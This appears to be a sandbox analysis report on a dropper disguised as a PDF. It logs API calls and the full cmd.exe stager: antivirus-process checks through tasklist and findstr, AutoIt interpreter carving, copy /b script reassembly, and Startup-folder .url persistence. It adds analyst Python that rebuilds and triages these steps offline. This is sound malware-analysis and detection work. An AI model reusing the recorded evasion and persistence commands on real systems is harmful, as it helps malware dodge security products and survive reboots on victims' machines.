Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr TID: 5580 Thread sleep count: 65 > 30
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062D5 FindFirstFileW,FindClose, 0_2_004062D5
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00402E18 FindFirstFileW, 0_2_00402E18
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE4005
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose, 11_2_00AE494A
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 11_2_00AE3CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEC2FF
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 11_2_00AECD9F
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AECD14 FindFirstFileW,FindClose, 11_2_00AECD14
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF5D8
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 11_2_00AEF735
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 11_2_00AEFA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00764005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00764005
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076494A GetFileAttributesW,FindFirstFileW,FindClose, 17_2_0076494A
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076C2FF
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD14 FindFirstFileW,FindClose, 17_2_0076CD14
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 17_2_0076CD9F
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F5D8
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 17_2_0076F735
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0076FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 17_2_0076FA36
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00763CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 17_2_00763CE2
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 11_2_00A95D13
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\185027
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\
Source: Spy.pif, 0000000B.00000002.3351472236.00000000016F4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: NanoCipher.scr, 00000011.00000002.3351187223.0000000001A70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF45D5 BlockInput, 11_2_00AF45D5
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00A95240
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 11_2_00AB5CAC
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00AD88CD
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_00AAA385
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AAA354 SetUnhandledExceptionFilter, 11_2_00AAA354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072A354 SetUnhandledExceptionFilter, 17_2_0072A354
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0072A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_0072A385
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD9369 LogonUserW, 11_2_00AD9369
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 11_2_00A95240
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE1AC6 SendInput,keybd_event, 11_2_00AE1AC6
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE51E2 mouse_event, 11_2_00AE51E2
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Yes Yes.bat & Yes.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 185027
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "venezuelalandscapesmeantposters" Tournaments
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Martin + ..\Organizing + ..\Finnish + ..\Determined + ..\Already + ..\Presentations + ..\Hint H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Spy.pif H
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
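The cmd.exe chain recorded above is a complete stager: `copy Yes Yes.bat & Yes.bat` renames a dropped file into a batch script, two `tasklist | findstr /I "..."` pairs look for security-product processes, `findstr /V "venezuelalandscapesmeantposters" Tournaments` carves the AutoIt interpreter out of a padded file by dropping every line that contains the filler marker (the report does not show where that output is redirected), `copy /b ..\Martin + ... + ..\Hint H` reassembles the script from chunks in the listed order, `Spy.pif H` runs it, and `choice /d y /t 5` is a five-second sleep. The following Python is an added analyst example, not code from the sample or the sandbox: it re-implements the findstr, copy /b and tasklist steps offline so the payload can be rebuilt from the dropped files without running anything. The marker, chunk order, search words and AutoIt strings are copied from the report; every file body and the tasklist output are constructed stand-ins, and the function names are the author's own.

```python
"""Offline re-implementation of the cmd.exe stager steps the sandbox recorded.

Added analyst example, not code from the sample or the sandbox. Every file body
below is a CONSTRUCTED stand-in; the real dropped files (Tournaments, Martin,
Organizing, ...) are not reproduced here.
"""
from typing import Dict, List, Sequence

# Literal taken from the recorded `findstr /V "..." Tournaments` command.
FINDSTR_MARKER = "venezuelalandscapesmeantposters"

# Chunk order taken from the recorded `copy /b ..\Martin + ... + ..\Hint H` command.
CHUNK_ORDER: List[str] = ["Martin", "Organizing", "Finnish", "Determined",
                          "Already", "Presentations", "Hint"]

# Search words from the two recorded `tasklist | findstr /I "..."` invocations.
AV_PROCESS_WORDS = ["wrsa", "opssvc",
                    "avastui", "avgui", "bdservicehost", "nswscsvc", "sophoshealth"]

# Strings the sandbox found in Spy.pif memory; they identify the AutoIt v3 runtime.
AUTOIT_MARKERS = (b">>>AUTOIT SCRIPT<<<", b"AutoIt script files (*.au3, *.a3x)")


def findstr_v(data: bytes, marker: str) -> bytes:
    """Emulate `findstr /V "<marker>" <file>`: emit only the lines that do NOT
    contain the marker. Lines are split on CR, LF or CRLF and each kept line is
    written back with its own terminator, so bytes outside marker lines survive
    untouched. Without /I findstr is case-sensitive, so this match is too."""
    needle = marker.encode()
    return b"".join(line for line in data.splitlines(keepends=True)
                    if needle not in line)


def copy_b(chunks: Dict[str, bytes], order: Sequence[str]) -> bytes:
    """Emulate `copy /b a + b + ... out`: binary concatenation in the given order.
    The order is the one on the command line, not alphabetical."""
    missing = [name for name in order if name not in chunks]
    if missing:
        raise FileNotFoundError(f"missing chunk files: {missing}")
    return b"".join(chunks[name] for name in order)


def av_check(tasklist_output: str, words: Sequence[str]) -> List[str]:
    """Emulate `tasklist | findstr /I "w1 w2 ..."`: findstr treats each
    space-separated word as its own search string, matches case-insensitively
    and prints every line containing any of them. Returns the matching lines;
    an empty list is what the batch file sees as "no security product"."""
    lowered = [w.lower() for w in words]
    return [line for line in tasklist_output.splitlines()
            if any(w in line.lower() for w in lowered)]


def looks_like_autoit(data: bytes) -> bool:
    """Cheap check that a carved file is the AutoIt runtime, using the strings
    the sandbox reported from Spy.pif memory."""
    return any(marker in data for marker in AUTOIT_MARKERS)


# ---- constructed sample inputs (stand-ins, not the real dropped files) -----
SAMPLE_TOURNAMENTS = (
    b"MZ\x90\x00 constructed PE-like bytes\n"
    + b"padding " + FINDSTR_MARKER.encode() + b" padding\n"
    + b">>>AUTOIT SCRIPT<<<\n"
    + FINDSTR_MARKER.encode() + b"\n"
    + b"AutoIt script files (*.au3, *.a3x)\n"
)
SAMPLE_CHUNKS = {name: f"<{name}>".encode() for name in CHUNK_ORDER}
SAMPLE_TASKLIST = (
    "Image Name                     PID Session Name\n"
    "========================= ======== ================\n"
    "explorer.exe                  1234 Console\n"
    "AvastUI.exe                   2222 Console\n"
    "cmd.exe                       3333 Console\n"
)


def rebuild_stage(tournaments: bytes, chunks: Dict[str, bytes]) -> Dict[str, object]:
    """Run the recorded steps in order and return the carved interpreter, the
    reassembled script, and whether the carve looks like AutoIt."""
    interpreter = findstr_v(tournaments, FINDSTR_MARKER)
    script = copy_b(chunks, CHUNK_ORDER)
    return {"interpreter": interpreter, "script": script,
            "interpreter_is_autoit": looks_like_autoit(interpreter)}


if __name__ == "__main__":
    result = rebuild_stage(SAMPLE_TOURNAMENTS, SAMPLE_CHUNKS)
    print("carved interpreter bytes:", len(result["interpreter"]))
    print("looks like AutoIt:", result["interpreter_is_autoit"])
    print("script:", result["script"])
    print("security processes seen:", av_check(SAMPLE_TASKLIST, AV_PROCESS_WORDS))
```

On a real case, read the dropped `Tournaments` and chunk files from the sandbox's dropped-file archive into `SAMPLE_TOURNAMENTS` and `SAMPLE_CHUNKS`; the carved interpreter should then be a valid PE and `looks_like_autoit` should be true, while `H` is the script the interpreter is handed.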
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr "C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr" "C:\Users\user\AppData\Local\NanoSec Cryptographics\o"
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & echo url="c:\users\user\appdata\local\nanosec cryptographics\nanocipher.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\nanocipher.url" & exit
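The persistence step above writes a two-line Internet Shortcut into the per-user Startup folder whose URL= target is not a web address but a local .js file (the report then shows wscript.exe launching NanoCipher.scr from that same folder). Because cmd's `echo` copies its arguments verbatim, the file ends up with the literal quotes around the path and a trailing space on each line in front of the redirect operator, which a naive parser trips over. The Python below is an added triage example, not code from the sample or the sandbox: it parses a .url file body and flags a Startup shortcut whose target is a local script or binary. The file body is a constructed reproduction of what the recorded echo commands produce, and the extension list and function names are the author's own assumptions.

```python
"""Triage of the Startup-folder .url persistence the sandbox recorded.

Added analyst example, not code from the sample or the sandbox. SAMPLE_URL_FILE
is a CONSTRUCTED reproduction of what the two recorded cmd.exe `echo` commands
write; the real dropped file is not reproduced.
"""
from pathlib import PureWindowsPath
from typing import Dict

# cmd's `echo` copies its arguments verbatim: the quotes around the path and
# the space in front of each redirect operator end up in the file, so the
# parser has to tolerate both.
SAMPLE_URL_FILE = (
    "[internetshortcut] \r\n"
    'url="c:\\users\\user\\appdata\\local\\nanosec cryptographics\\nanocipher.js" \r\n'
)

# Assumed list: extensions whose presence in a Startup .url target means
# "script or binary runs at logon" rather than "web page opens at logon".
EXECUTABLE_SUFFIXES = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                       ".scr", ".exe", ".pif", ".com", ".bat", ".cmd", ".ps1"}


def parse_url_file(text: str) -> Dict[str, Dict[str, str]]:
    """Minimal INI parser for .url files: section and key names are folded to
    lower case, surrounding whitespace is dropped, and a value wrapped in
    double quotes is unwrapped (the recorded command writes url="...")."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is not None and "=" in line:
            key, _, value = line.partition("=")
            value = value.strip()
            if len(value) >= 2 and value[0] == value[-1] == '"':
                value = value[1:-1]
            sections[current][key.strip().lower()] = value
    return sections


def classify_target(url: str) -> str:
    """'web' for http(s) targets, 'local_executable' for a local path or file:
    URL whose extension is in EXECUTABLE_SUFFIXES, 'local_other' otherwise."""
    lowered = url.lower()
    if lowered.startswith(("http://", "https://")):
        return "web"
    if lowered.startswith("file:///"):
        lowered = lowered[len("file:///"):]
    return ("local_executable"
            if PureWindowsPath(lowered).suffix in EXECUTABLE_SUFFIXES
            else "local_other")


def triage_startup_url(text: str) -> Dict[str, str]:
    """Return the URL= target of an [InternetShortcut] file and a verdict.
    A Startup .url pointing at a local script is exactly the shape the report
    shows: nanocipher.url -> nanocipher.js."""
    url = parse_url_file(text).get("internetshortcut", {}).get("url", "")
    verdict = classify_target(url) if url else "no_url"
    return {"url": url, "verdict": verdict}


if __name__ == "__main__":
    print(triage_startup_url(SAMPLE_URL_FILE))
```

To hunt for this on a live host, read every *.url under each user's `AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup` and pass the contents to `triage_startup_url`; a `local_executable` verdict is worth a look even when the target file no longer exists, since the shortcut itself is the persistence artifact.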
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 11_2_00AD88CD
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AE4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 11_2_00AE4F1C
Source: scan_doc_zapit_836893.pdf.exe, 00000000.00000003.2103831695.000000000290D000.00000004.00000020.00020000.00000000.sdmp, Spy.pif, 0000000B.00000003.2151374293.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Spy.pif, 0000000B.00000000.2143063108.0000000000B36000.00000002.00000001.01000000.00000006.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Spy.pif, NanoCipher.scr Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AA885B cpuid 11_2_00AA885B
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AC0030 GetLocalTime,__swprintf, 11_2_00AC0030
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AC0722 GetUserNameW, 11_2_00AC0722
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AB416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 11_2_00AB416A
Source: C:\Users\user\Desktop\scan_doc_zapit_836893.pdf.exe Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00406805
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: NanoCipher.scr Binary or memory string: WIN_81
Source: NanoCipher.scr Binary or memory string: WIN_XP
Source: NanoCipher.scr Binary or memory string: WIN_XPe
Source: NanoCipher.scr Binary or memory string: WIN_VISTA
Source: NanoCipher.scr Binary or memory string: WIN_7
Source: NanoCipher.scr Binary or memory string: WIN_8
Source: NanoCipher.scr.11.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 11_2_00AF696E
Source: C:\Users\user\AppData\Local\Temp\185027\Spy.pif Code function: 11_2_00AF6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 11_2_00AF6E32
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_0077696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 17_2_0077696E
Source: C:\Users\user\AppData\Local\NanoSec Cryptographics\NanoCipher.scr Code function: 17_2_00776E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 17_2_00776E32
No contacted IP information.